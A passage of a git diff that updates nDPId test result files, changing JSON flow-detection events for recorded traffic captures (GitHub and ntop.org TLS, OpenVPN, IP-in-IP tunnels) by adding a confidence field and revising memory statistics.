+00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00896{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}}
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 70/70
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605285 bytes
-~~ total memory freed........: 4605285 bytes
-~~ total allocations/frees...: 99631/99631
+~~ total memory allocated....: 4690238 bytes
+~~ total memory freed........: 4690238 bytes
+~~ total allocations/frees...: 101221/101221
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 1179 chars
-~~ json string avg len.......: 715 chars
+~~ json string max len.......: 1205 chars
+~~ json string avg len.......: 727 chars
diff --git a/test/results/443-opvn.pcap.out b/test/results/443-opvn.pcap.out
index c1c45248f..0831eb2f2 100644
--- a/test/results/443-opvn.pcap.out
+++ b/test/results/443-opvn.pcap.out
@@ -3,8 +3,8 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 46/46
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598211 bytes
-~~ total memory freed........: 4598211 bytes
-~~ total allocations/frees...: 99600/99600
+~~ total memory allocated....: 4683164 bytes
+~~ total memory freed........: 4683164 bytes
+~~ total allocations/frees...: 101190/101190
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 656 chars
-~~ json string avg len.......: 469 chars
+~~ json string max len.......: 682 chars
+~~ json string avg len.......: 480 chars
diff --git a/test/results/443-safari.pcap.out b/test/results/443-safari.pcap.out
index 8984de92f..c33d3d8d0 100644
--- a/test/results/443-safari.pcap.out
+++ b/test/results/443-safari.pcap.out
@@ -3,10 +3,10 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01110{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01136{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 41/41
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600964 bytes
-~~ total memory freed........: 4600964 bytes
-~~ total allocations/frees...: 99600/99600
+~~ total memory allocated....: 4685917 bytes
+~~ total memory freed........: 4685917 bytes
+~~ total allocations/frees...: 101190/101190
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 1115 chars
-~~ json string avg len.......: 690 chars
+~~ json string max len.......: 1141 chars
+~~ json string avg len.......: 703 chars
diff --git a/test/results/4in4tunnel.pcap.out b/test/results/4in4tunnel.pcap.out
index 21afa5567..e6370c0b6 100644
--- a/test/results/4in4tunnel.pcap.out
+++ b/test/results/4in4tunnel.pcap.out
@@ -18,9 +18,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 515 chars
diff --git a/test/results/4in6tunnel.pcap.out b/test/results/4in6tunnel.pcap.out
index b7f0d2b73..8233c0ad6 100644
--- a/test/results/4in6tunnel.pcap.out
+++ b/test/results/4in6tunnel.pcap.out
@@ -1,10 +1,10 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"4in6tunnel.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3}
 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1543235434019,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQAANHvwQAB\/BqsfwKgAAQoKCgH7xwG73+E+ggAAAACAAv\/\/fqUAAAIEBYQBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}}
 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1543235434019,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPTRKupQVKqw0AAAAAAAAACoi4BaF7ac4zFi98\/GqPyLYRQAANEufQABhBvlwCgoKAcCoAAEBu\/vHAwzKjt\/hPoOAEv\/\/sQUAAAIEBXgBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1543235434019,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":366,"pkt_l4_len":264,"ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAAQgEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQABCHv3QAB\/BqpEwKgAAQoKCgH7xwG73+E+gwMMyo9QGAQA0icAABYDAwDbAQAA1wMDW5uXE0\/QFYUpkWO+HpgF5MI5wT9TQj14SroSH1Zl8oggjz8AALXLO9H2rxfCGsjqy7cU6\/NXDrPxEswgEUGVcfAAJsAswCvAMMAvwCTAI8AowCfACsAJwBTAEwCdAJwAPQA8ADUALwAKAQAAaAAAABEADwAADHd3dy5iaW5nLmNvbQAKAAgABgAdABcAGAALAAIBAAANABQAEgQBBQECAQQDBQMCAwICBgEGAwAjAAAAEAAOAAwCaDIIaHR0cC8xLjEAFwAAABgABgAKAwIBAP8BAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}}
